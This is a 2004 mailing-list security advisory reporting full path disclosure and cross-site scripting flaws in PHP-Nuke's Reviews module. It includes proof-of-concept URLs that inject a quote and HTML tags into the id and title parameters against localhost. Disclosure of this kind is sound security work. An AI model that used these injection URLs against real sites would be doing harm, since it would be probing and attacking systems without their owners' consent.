[35179] in bugtraq
Multiple vulnerabilities PHP-Nuke
daemon@ATHENA.MIT.EDU (Dark Bicho)
Mon Jun 7 21:12:29 2004
From: "Dark Bicho" <k1ll3rb0y@hotmail.com>
To: full-disclosure@lists.netsys.com, bugtraq@securityfocus.com
Date: Mon, 07 Jun 2004 16:30:38 -0500
Mime-Version: 1.0
Content-Type: text/plain; charset=iso-8859-1; format=flowed
Message-ID: <BAY8-F36lnJ2IKkVmkL00064b31@hotmail.com>
original advisory : http://bichosoft.webcindario.com/advisory-05.txt
-------------------------------------------------------------------------------------------------
:.: Multiple vulnerabilities PHP-Nuke :.:
PROGRAM: PHP-Nuke
HOMEPAGE: http://phpnuke.org/
VERSION: 6.x, 7.2, 7.3
BUG: Multiple vulnerabilities
DATE: 14/05/2004
AUTHOR: DarkBicho
web: http://www.darkbicho.tk
team: Security Wari Proyects <www.swp-zone.org>
Email: darkbicho@peru.com
-------------------------------------------------------------------------------------------------
1.- Affected software description:
-----------------------------
Php-Nuke is a popular content management system, written in php by
Francisco Burzi.
2.- Vulnerabilities:
---------------
A. Full path disclosure:
This vulnerability would allow a remote user to determine the full
path to the web root directory and other potentially sensitive
information.
:.: Examples:
http://localhost/nuke1/modules.php?name=Reviews&rop=showcontent&id='DarkBicho
Warning: date(): Windows does not support dates prior to midnight
(00:00:00),
January 1, 1970 in c:\appserv\www\nuke1\modules\Reviews\index.php on
line 527
B. Cross-Site Scripting aka XSS:
:.: id :
*
http://localhost/nuke1/modules.php?name=Reviews&rop=postcomment&id='&title=a
<input type=hidden name=id value='>
:.: title :
*
http://localhost/nuke1/modules.php?name=Reviews&rop=postcomment&id='&title=a
:.: Examples:
http://localhost/nuke1/modules.php?name=Reviews&rop=postcomment&id='<h1>DarkBicho</h1&title=a
http://localhost/nuke1/modules.php?name=Reviews&rop=postcomment&id='&title=<h1>DarkBicho</h1>
3.- SOLUTION:
¨¨¨¨¨¨¨¨
Vendors were contacted many weeks ago and plan to release a fixed
version soon.
Check the PHP-NUKE website for updates and official release details.
4.- Greetings:
---------
greetings to my Peruvian group swp and perunderforce :D
"EL PISCO ES Y SERA PERUANO"
5.- Contact
-------
WEB: http://www.darkbicho.tk
EMAIL: darkbicho@peru.com
-------------------------------------------------------------------------------------------------
___________ ____________
/ _____/ \ / \______ \
\_____ \\ \/\/ /| ___/
/ \\ / | |
/_______ / \__/\ / |____|
\/ \/
Security Wari Projects
(c) 2002 - 2004
Made in Peru
----------------------------------------[ EOF
]----------------------------------------------
_________________________________________________________________
Consigue aquí las mejores y mas recientes ofertas de trabajo en América
Latina y USA: http://latam.msn.com/empleos/
